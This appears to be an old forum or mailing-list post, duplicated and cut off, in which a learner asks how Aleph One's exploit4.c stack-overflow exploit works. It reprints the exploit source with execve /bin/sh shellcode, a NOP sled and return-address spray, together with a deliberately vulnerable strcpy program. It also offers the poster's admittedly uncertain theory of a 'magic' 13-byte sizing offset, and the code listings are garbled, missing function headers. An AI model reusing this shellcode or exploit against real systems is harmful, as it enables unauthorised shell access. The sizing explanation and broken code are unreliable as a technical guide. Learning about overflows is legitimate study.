Recently, I have been reading as many buffer overflow texts as I could
get my hands on. I looked at every C-construct, and every word like it
was equally important. In doing so, I know quite a bit about buffer
overflows now. BUT, there is a problem.
In AlephOne's "Smashing the Stack for Fun and Profit" (Phrack 49, File
14), there is an example of a general exploit. It is called
"exploit4.c". In it, it sets up an environment variable named "RET" that
contains nothing but the address of a location where the shellcode (and
NOPs) are. The shellcode (and NOPs) are placed in an environment
variable named "EGG". "EGG" is created first, then "RET". Then the
program calls a shell "/bin/bash" (to setup the environment for the
general exploit). My question is, what happens EXACTLY after bash is
called?
Here's my theory so you can know how much depth I want:
Once a program is called, the kernel allocates a new stack where all of
the environment variables are placed, including "EGG" and "RET". Next,
you call your vulnerable program with the argument that will overflow
the buffer (eg. "simple $RET"). The stack now looks like THIS:
simple ---> [data] [buffer] [sfp] [ret] [argc] [argvp] [envp] [data]
[argvs] [envs] [data] ||| bash ---> [data] [sfp] [ret] [argc] [argvp]
[envp] [data] [argvs] [envs <<$EGG is here>>] [data] ||| exploit4 --->
[data] [sfp] [ret] [argc] [argvp] [envp] [data] [argvs] [envs] [data]
...
[[the above looks ugly when posted....it might be easier to write it
down on paper]]
where "|||" is just a separator, "sfp" is the saved frame pointer, "ret"
is the IP (Instruction Pointer) that is the returning point when the
program is finished, "argc" is obvious, "argvp" is the pointer to the
"argvs" (argv strings), "envp" is the pointer to the "envs" environment
strings, and "data" is majikal stuff so I have no idea as to what it is.
NOTE: the "simple" program is at the top of the stack.
The reason exploit4 works, is because it uses the esp for exploit4, and
$EGG must lie in that area if it is big enough. Esp for exploit4 is in
between the separator and data for the exploit4 stack.
My theory stops incomplete because the data right before the separator
of exploit4 is blocking $EGG from using exploit4's esp!
But, another theory, is that data for exploit4 is put somewhere else, so
data for bash can go in it's place. THEN, $EGG can be in esp's path.
OR, bash doesn't get involved like this, and it's just simple that is
right after exploit4.
<shrug>
Here's exploit4.c and simple.c :
exploit4.c
----
/*
Written by AlephOne. Published in Phrack49's 14th file named "Smashing
the Stack for Fun and Profit".
This file has been modified.
Modified DEFAULT_BUFFER_SIZE to 6049. The default is 512.
*/
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 6049
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/bin/bash");
simple.c
----
/*
Set your overflow buffer to 6049 bytes.
*/
void function(char *temp)
{
char buffer1[5001];
int *seven;
char *nine;
char s[1024];
strcpy(s, temp);
{
function(argv[1]);
NOTE: in exploit4.c I changed DEFAULT_BUFFER_SIZE to reflect an EXACT
buffer size to overflow simple's buffer. It's EXACT. You can't get any
better. Hehehe. Here's how to find the exact buffer:
Find the byte values for each variable.
buffer1 = 5001
seven = 4
nine = 4
s = 1024
Then look at EACH varible and see if it is divisible by four. If it
isn't, then add a byte until it gets that way. The reason they have to
be divisible by four is explained in AlephOne's article.
So:
buffer1 = 5004
seven = 4
nine = 4
s = 1024
Add 'em up: 6036. Then add 13 (the magic value): 6049.
I'll post an in-depth explanation on this later. Right now, I'm still
finding out the EXACT reason for the magic value of 13. My theory is
this:
[buffer] [sfp] [ret] [data]
^ ^ ^ ^
| | | |
0x0 0x1794 0x1798 0x179c
buffer is 6036 bytes.
sfp is 4 bytes.
ret is 4 bytes.
data doesn't matter.
You'd think it would be 6036+8 (6044 [0x179c]) wouldn't you? BUT, I
think that when you put data in a memory location, you have to stick in
4 bytes FIRST so, in reality the END of ret is actually 6036+12 (6048
[0x17a0]).
When I say you have to stick in 4 bytes first, it means, you have to
stick in four bytes in 0x0, for example, before you can find out the
four-byte (word) data that is in 0x0.
Now, it's -13-, because you have to NULL-termiate the overflow
(shellcode+NOPs).
Anyway, it doesn't make too much sense to me right now, so keep in mind
this is just a -thought-. If I knew anything about memory addressing for
the i386 I could know for sure, so I welcome -any- comments. Note, I've
tested this quite a bit, so I can pretty much say that you add 13 and
you will get the EXACT buffer size. Try different ones and see for
yourself. (make it lower and you'll get errors, make it higher and it
works).
--
Recently, I have been reading as many buffer overflow texts as I could
get my hands on. I looked at every C-construct, and every word like it
was equally important. In doing so, I know quite a bit about buffer
overflows now. BUT, there is a problem.
In AlephOne's "Smashing the Stack for Fun and Profit" (Phrack 49, File
14), there is an example of a general exploit. It is called
"exploit4.c". In it, it sets up an environment variable named "RET" that
contains nothing but the address of a location where the shellcode (and
NOPs) are. The shellcode (and NOPs) are placed in an environment
variable named "EGG". "EGG" is created first, then "RET". Then the
program calls a shell "/bin/bash" (to setup the environment for the
general exploit). My question is, what happens EXACTLY after bash is
called?
Here's my theory so you can know how much depth I want:
Once a program is called, the kernel allocates a new stack where all of
the environment variables are placed, including "EGG" and "RET". Next,
you call your vulnerable program with the argument that will overflow
the buffer (eg. "simple $RET"). The stack now looks like THIS:
simple ---> [data] [buffer] [sfp] [ret] [argc] [argvp] [envp] [data]
[argvs] [envs] [data] ||| bash ---> [data] [sfp] [ret] [argc] [argvp]
[envp] [data] [argvs] [envs <<$EGG is here>>] [data] ||| exploit4 --->
[data] [sfp] [ret] [argc] [argvp] [envp] [data] [argvs] [envs] [data]
...
where "|||" is just a separator, "sfp" is the saved frame pointer, "ret"
is the IP (Instruction Pointer) that is the returning point when the
program is finished, "argc" is obvious, "argvp" is the pointer to the
"argvs" (argv strings), "envp" is the pointer to the "envs" environment
strings, and "data" is majikal stuff so I have no idea as to what it is.
NOTE: the "simple" program is at the top of the stack.
The reason exploit4 works, is because it uses the esp for exploit4, and
$EGG must lie in that area if it is big enough. Esp for exploit4 is in
between the separator and data for the exploit4 stack.
My theory stops incomplete because the data right before the separator
of exploit4 is blocking $EGG from using exploit4's esp!
But, another theory, is that data for exploit4 is put somewhere else, so
data for bash can go in it's place. THEN, $EGG can be in esp's path.
OR, bash doesn't get involved like this, and it's just simple that is
right after exploit4.
<shrug>
Here's exploit4.c and simple.c :
exploit4.c
----
/*
Written by AlephOne. Published in Phrack49's 14th file named "Smashing
the Stack for Fun and Profit".
This file has been modified.
Modified DEFAULT_BUFFER_SIZE to 6049. The default is 512.
*/
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 6049
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr =
...
read more »